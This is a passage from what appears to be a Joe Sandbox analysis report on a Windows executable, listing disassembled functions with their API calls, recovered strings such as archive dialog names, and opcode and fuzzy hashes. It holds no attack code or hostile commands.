                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: be8967df6c7214877f688a8190ed96396ca2dacbcb7306af8622beacf159b2df
                • Instruction ID: ac41c7ccac5d8d2e9fd5d473dbff9666604ab3f454cc5cbd171ae0f1c9b83900
                • Opcode Fuzzy Hash: be8967df6c7214877f688a8190ed96396ca2dacbcb7306af8622beacf159b2df
                • Instruction Fuzzy Hash: E741AF32A103049BDF24EF78C881A6EB7A5FF89714B5945A9E515EB241DB31ED01CB81
                Function 0089B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0089B619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0089B63C
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0089B662
                • _free.LIBCMT ref: 0089B675
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0089B684
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 6d278f973ef2a88908f99be0fdd53cd16d78ffe2539e3879dd05d94d62ea5c91
                • Instruction ID: 21d0a8a74224780fba49fb49ea2e1e0713c4e0d948c2c7a8c92d8e920da20e30
                • Opcode Fuzzy Hash: 6d278f973ef2a88908f99be0fdd53cd16d78ffe2539e3879dd05d94d62ea5c91
                • Instruction Fuzzy Hash: BB0184B2602315BF6B2236BA7D8CC7B6A6DFED7BA13190229B904D3510DF60DD0195B1
                Function 00899029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,008B0EE8,00000200,0089895F,008958FE,?,?,?,?,0087D25E,?,033F3800,00000063,00000004,0087CFE0,?), ref: 0089902E
                • _free.LIBCMT ref: 00899063
                • _free.LIBCMT ref: 0089908A
                • SetLastError.KERNEL32(00000000,008A3958,00000050,008B0EE8), ref: 00899097
                • SetLastError.KERNEL32(00000000,008A3958,00000050,008B0EE8), ref: 008990A0
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 0deb41855b8d51d0c17cf05c9c2b0fb998d0acf14a6d5a4af779d684c0148b3a
                • Instruction ID: 8215a5cbcc7fd16d6f4cb5aa61a86b7eb7cf106d14453dbc4f08941eb9201446
                • Opcode Fuzzy Hash: 0deb41855b8d51d0c17cf05c9c2b0fb998d0acf14a6d5a4af779d684c0148b3a
                • Instruction Fuzzy Hash: 64012632201E016A9E32777C6C8592B262DFFE337132D012CF465D3651EE24CC014061
                Function 0088075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00880A41: ResetEvent.KERNEL32(?), ref: 00880A53
                  • Part of subcall function 00880A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00880A67
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0088078F
                • CloseHandle.KERNEL32(?,?), ref: 008807A9
                • DeleteCriticalSection.KERNEL32(?), ref: 008807C2
                • CloseHandle.KERNEL32(?), ref: 008807CE
                • CloseHandle.KERNEL32(?), ref: 008807DA
                  • Part of subcall function 0088084E: WaitForSingleObject.KERNEL32(?,000000FF,00880A78,?), ref: 00880854
                  • Part of subcall function 0088084E: GetLastError.KERNEL32(?), ref: 00880860
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 23dbf92ba5196e61e5ab420e1df26a338016e4cd84f65a627da7de53e123d5db
                • Instruction ID: 18acf5c49ff81ba90b0e753447f14f49fb33577cd001fbc6dfacf9fc184f8e98
                • Opcode Fuzzy Hash: 23dbf92ba5196e61e5ab420e1df26a338016e4cd84f65a627da7de53e123d5db
                • Instruction Fuzzy Hash: E901B571440B04EFDB22AB69DD84FC6FBE9FB4A710F000529F15A82560CB766A48CF90
                Function 0089BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 0089BF28
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 0089BF3A
                • _free.LIBCMT ref: 0089BF4C
                • _free.LIBCMT ref: 0089BF5E
                • _free.LIBCMT ref: 0089BF70
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: dff50d2b8afba9df849d2f312c1656a661461debe2caf881d676db78fd6f65ca
                • Instruction ID: 249a290e4099d18b235886c2f24b30548b67165aadc3108e93ee17fa08c521f3
                • Opcode Fuzzy Hash: dff50d2b8afba9df849d2f312c1656a661461debe2caf881d676db78fd6f65ca
                • Instruction Fuzzy Hash: 39F0E732509606EB9A20FB6CFE86C1A77E9FE027107694C59F008D7D10CF20FC808E69
                Function 00898060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 0089807E
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 00898090
                • _free.LIBCMT ref: 008980A3
                • _free.LIBCMT ref: 008980B4
                • _free.LIBCMT ref: 008980C5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 6abe1efc1d075c62c12c1358bac05a5558aa997b5e268b3c0090c41aaa49d58e
                • Instruction ID: 94215581a256a3ccd024e9d50a7fbc3f207afa2438036e74ee98ce1840882dc3
                • Opcode Fuzzy Hash: 6abe1efc1d075c62c12c1358bac05a5558aa997b5e268b3c0090c41aaa49d58e
                • Instruction Fuzzy Hash: 94F01774906526EB9F51BB19BC194053B65FF2672030E4B5BF400D6E70CB3298529FC6
                Function 008976BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QIKiV83Pkl.exe,00000104), ref: 008976FD
                • _free.LIBCMT ref: 008977C8
                • _free.LIBCMT ref: 008977D2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\QIKiV83Pkl.exe
                • API String ID: 2506810119-2171911237
                • Opcode ID: b1e28dfc787a6c9f4c4b4ef17add610cc944ec1bfcee3a35b9bf6d13fa2adc0e
                • Instruction ID: 044e901b0b1e8edd8b66cfd24e8309fddab2e24c9e25fd1cd2138ebcfb8a2346
                • Opcode Fuzzy Hash: b1e28dfc787a6c9f4c4b4ef17add610cc944ec1bfcee3a35b9bf6d13fa2adc0e
                • Instruction Fuzzy Hash: CE319E71A19209FFDF21EFD9EC8599EBBECFF95310B1841A6E804D7211D6708A40CB91
                Function 00877574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00877579
                  • Part of subcall function 00873B3D: __EH_prolog.LIBCMT ref: 00873B42
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00877640
                  • Part of subcall function 00877BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877C04
                  • Part of subcall function 00877BF5: GetLastError.KERNEL32 ref: 00877C4A
                  • Part of subcall function 00877BF5: CloseHandle.KERNEL32(?), ref: 00877C59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: 9358762aa6d65fc2dc9c59c31d9b28a51183f4f17c3c753f09445417c7625f24
                • Instruction ID: bef3ddc091a1ea10ab339d1ec0803aaa837e7e6fcd4635bf36b164614a0611cb
                • Opcode Fuzzy Hash: 9358762aa6d65fc2dc9c59c31d9b28a51183f4f17c3c753f09445417c7625f24
                • Instruction Fuzzy Hash: BE31D571A04648AEEF20EB6CDC45BEE7B69FF15314F048155F448E7256DB70CA44CBA2
                Function 0088A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088A4B8
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0088A4CD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088A4E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 7c615080e5f49e2c6ad2330c85e7e9e70c51697877c03a0c9c893f1ac03bd226
                • Instruction ID: 9c72697945976a6d7bcd7ea8c0880d2cb4dd3d1f72f4ee4af3ab96274a8617a8
                • Opcode Fuzzy Hash: 7c615080e5f49e2c6ad2330c85e7e9e70c51697877c03a0c9c893f1ac03bd226
                • Instruction Fuzzy Hash: 8711E632245200AFEE25AFA8DC4DF6A3769FB4A700F104103F205D71E1C7A19911DB2B
                Function 0087D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: ea724d270fb1774f7acdca5f0536b6a2653bc3970ec3710b28d7a2606bc1209a
                • Instruction ID: 9eb9d4c16dc45effa73b8993df0503959485b23b14ab9f32105509332a675532
                • Opcode Fuzzy Hash: ea724d270fb1774f7acdca5f0536b6a2653bc3970ec3710b28d7a2606bc1209a
                • Instruction Fuzzy Hash: 87216F7245030CABEF21DEA8CC46FEA7BB8FF05300F048512FA18D6196D771EA559B51
                Function 0088A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088A9DE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0088A9F6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 0088AA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1
                • API String ID: 445417207-3292211884
                • Opcode ID: cf17ff29a35cd507a28d63d46ad75be13c74559fe93eae47646f981d08cd3813
                • Instruction ID: 62bd16a15109feeeab98e6015bfc1cba13c1603ac8d59d49b389b4aeeadcab11
                • Opcode Fuzzy Hash: cf17ff29a35cd507a28d63d46ad75be13c74559fe93eae47646f981d08cd3813
                • Instruction Fuzzy Hash: 8A114832944128BAEB29AA689D09FFA3B3CFB49700F000023FA49F24C1C2A09D51D772
                Function 0087B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • _swprintf.LIBCMT ref: 0087B51E
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • _wcschr.LIBVCRUNTIME ref: 0087B53C
                • _wcschr.LIBVCRUNTIME ref: 0087B54C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: ec498afd02b0004b8550c871b071b045d877a662a846507d60a7f90baf3d19a6
                • Instruction ID: f80d949107be2782254b2b60b059b85841877f4e9d6ab53baafa9cc79d72cff0
                • Opcode Fuzzy Hash: ec498afd02b0004b8550c871b071b045d877a662a846507d60a7f90baf3d19a6
                • Instruction Fuzzy Hash: 4701F953904311BADB20ABB99C46E6BB7ADFE963A07598416F849C6085FB30D950C2A2
                Function 008806BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                Download Yara Rule
                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0087ABC5,00000008,?,00000000,?,0087CB88,?,00000000), ref: 008806F3
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0087ABC5,00000008,?,00000000,?,0087CB88,?,00000000), ref: 008806FD
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0087ABC5,00000008,?,00000000,?,0087CB88,?,00000000), ref: 0088070D
                Strings
                • Thread pool initialization failed., xrefs: 00880725
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: 0af95ce48905b2053cfcee755e3bd53f1b329087500fec023f5316411c1beaa9
                • Instruction ID: 09e4f4274eabf8a0d52b4b1ac410cce5e9bc808128d567bbc5bf29ec20036320
                • Opcode Fuzzy Hash: 0af95ce48905b2053cfcee755e3bd53f1b329087500fec023f5316411c1beaa9
                • Instruction Fuzzy Hash: 131151B1504709AFD3216F659884AA7FBECFBA5754F20482EF1DAC6200E6716984CF60
                Function 0088D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: 5ffc5cd8f6fcde4efe038abcce571bb989ef655c99525c0e87a0c4eabc862646
                • Instruction ID: 24c458fce472d5e2b8a6078292ecc70869c661a0687acbcd28c946b7095ec4c8
                • Opcode Fuzzy Hash: 5ffc5cd8f6fcde4efe038abcce571bb989ef655c99525c0e87a0c4eabc862646
                • Instruction Fuzzy Hash: E601DF71A00349EFDB11AF58EC44E9A7BA9F718384F004631F905D23B0DA71AC50EFA5
                Function 008991DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                • Instruction ID: b0ec827bacfac8c429092a738b11ee5035c5be6d291e4fbd0b978a4a3a20cedb
                • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                • Instruction Fuzzy Hash: 35A134719002869FEF22AF6CC8917AEBBA5FF55310F1C416DE4D5DB381C2389942C755
